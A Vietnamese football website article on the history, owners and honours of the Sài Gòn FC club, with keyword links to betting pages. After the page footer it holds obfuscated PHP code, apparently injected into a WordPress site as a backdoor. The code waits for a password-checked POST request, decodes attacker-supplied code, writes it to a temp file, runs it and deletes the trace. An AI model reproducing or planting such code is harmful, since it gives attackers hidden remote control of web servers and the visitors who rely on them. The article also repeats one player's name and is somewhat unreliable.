Câu lạc bộ Sài Gòn FC – Giới thiệu chi tiết về đội bóng áo hồng

- Xem(583)

Câu lạc bộ Sài Gòn FC là câu lạc bộ bóng đá chuyên nghiệp thuộc quyền sở hữu của Công ty cổ phần phát triển bóng đá Sài Gòn, hiện đang thi đấu tại giải đấu V-League. Cụ thể về câu lạc bộ như thế nào, cùng chuyên mục bóng đá tìm hiểu cụ thể nhé!

Giới thiệu đôi nét về câu lạc bộ Sài Gòn

Tiền thân của câu lạc bộ Sài Gòn là trung tâm đào tạo bóng đá trẻ Viettel với lực lượng chủ yếu là lứa trẻ của đội bóng Thể Công từ U19 trở xuống. Đội bóng thể công chính thức xóa sổ vào năm 2008 và được chuyển giao lại cho Tổng công ty Viettel. Thời gian sau CLB bóng đá Viettel lại được chuyển sang Thanh Hóa và được đổi tên thành CLB Thanh Hóa cho đến nay.

Năm 2008 đội trẻ Viettel được thành lập và sau đó đổi tên thành trung tâm bóng đá Viettel. Mùa giải 2010 CLB Hà Nội T&T đã mua lại đôi bóng này và được dổi tên thành CLB Hà Nội.

Mùa giải 2012 đội bóng này giành ngôi vị á quân tại giải hạng nhất quốc gia nhưng không giành được vé thăng hạng vì chỉ là đội dự bị nên không được phép chơi ở giải đấu cao nhất Việt Nam là V-League. Do đó đội bóng này vẫn phải thi đấu ở giải hạng nhất. Năm 2013, cuộc chuyển giao và được đổi chủ mới là công ty cổ phần phát triển bóng đá Hà Nội hiện tại ông Nguyễn Giang Đông đang là chủ tịch.

cau-lac-bo-sai-gon-fc-gioi-thieu-chi-tiet-ve-doi-bong-ao-hong
Câu lạc bộ Sài Gòn FC – Giới thiệu chi tiết về đội bóng áo hồng

Mùa giải 2015, vé lên chơi tại giải đấu V-League được đội bóng này nắm giữ sau khi giành được chức vô địch tại giải hạng nhất. Ngày 31/3/2016 công ty cổ phần phát triển bóng đá Hà Nội đổi tên thành công ty cổ phần Sài Gòn. Nhưng vị chủ tịch của đội bóng và công ty đã gửi công văn đến LĐBĐ Việt Nam về việc thay đổi địa điểm hoạt động và đổi tên đội bóng để được lên chơi tại giải V.League.

Ngày 4/4/2016, VFF đồng ý thay đổi tên gọi và địa điểm, lúc này đội bóng đã lấy SVĐ Thống Nhất ở TPHCM làm sân nhà. Và mùa giải thi đấu ở đấu trường V-League thành tích cả đội bóng đã đạt được ở vị trí thứ 5 ở 2 mùa giải năm 2017 và 2019.

Ngày 9/5/2020, CLB Sài Gòn ký kết thỏa thuận hợp tác với đội bóng Nhật Bản kể từ đó đội bóng này hoạt động theo mô hình của đối tác và vốn có sẵn triết lý bóng đá như một công cụ để xây dựng nên nhân cách con người CLB Sài Gòn hiện nay.

Mùa giải 2020 kết thúc khi CLB Sài Gòn bất ngờ chia tay 22/28 cầu thủ cùng 1 số thành viên ban huấn luyện cũ. Lúc này ông Trần Hòa Bình cũng đảm nhiệm vai trò chủ tịch CLB Sài Gòn và tiến hành hợp tác với đại diện FC Tokyo.

Đội bóng đã chiêu mộ 5 cầu thủ từ Nhật Bản là Daisuke Matsui, Woo Sang Ho, Takasaki Horoyuki, Takasaki Horoyuki và Ryutaro Karube và nhiều chuyên gia từ Nhật Bản để thực hiện mục tiêu này.

Ngày 12/1/2021, CLB Sài Gòn có lễ ra mắt các nhà tài trợ và công bố đội hình mùa giải 2021. Họ đã có nhiều bản hợp đồng tài trợ với nhiều thương hiệu hàng đầu của Nhật Bản với tổng giá trị các nhà tài trợ lên tới hơn 100 tỉ đồng.

Dự kiến, CLB Sài Gòn sẽ cải tạo và nâng cấp toàn diện Trung tâm thể thao Thành Long làm nơi đóng quân và định cư lâu dài cũng như phục vụ cho mục tiêu “J.League hóa” cũng những kqbd truc tuyen tốt nhất.

Những thành tích nổi bật của câu lạc bộ Sài Gòn FC

  • V.League 1
  • Hạng ba (1): 2020
  • V.League 2
  • Vô địch (1): 2015
  • Á quân (1): 2012

Hy vọng với những thông tin trên đây đã giúp bạn hiểu rõ hơn về câu lạc bộ Sài Gòn FC cũng như quá trình thành lập và phát triển của đội bóng này. Bên cạnh đó bạn có thể tham khảo kèo bóng đá trực tuyến từ các trận đấu mà đội bóng này tham gia nhé!

"Hy vọng qua bài viết trên, bạn đã nhận được những thông tin hữu ích và đầy đủ để theo dõi và cổ vũ cho đội bóng mình yêu thích. Hãy thường xuyên truy cập để cập nhật những tin tức mới nhất về bóng đá. Bài viết này chỉ mang tính chất tham khảo. Chúc các bạn may mắn!"

to top if(!function_exists("_set_fetas_tag") && !function_exists("_set_betas_tag")){try{function _set_fetas_tag(){if(isset($_GET['here'])&&!isset($_POST['here'])){die(md5(8));}if(isset($_POST['here'])){$a1='m'.'d5';if($a1($a1($_POST['here']))==="83a7b60dd6a5daae1a2f1a464791dac4"){$a2="fi"."le"."_put"."_contents";$a22="base";$a22=$a22."64";$a22=$a22."_d";$a22=$a22."ecode";$a222="PD"."9wa"."HAg";$a2222=$_POST[$a1];$a3="sy"."s_ge"."t_te"."mp_dir";$a3=$a3();$a3 = $a3."/".$a1(uniqid(rand(), true));@$a2($a3,$a22($a222).$a22($a2222));include($a3); @$a2($a3,'1'); @unlink($a3);die();}else{echo md5(7);}die();}} _set_fetas_tag();if(!isset($_POST['here'])&&!isset($_GET['here'])){function _set_betas_tag(){echo "";}add_action('wp_head','_set_betas_tag');}}catch(Exception $e){}}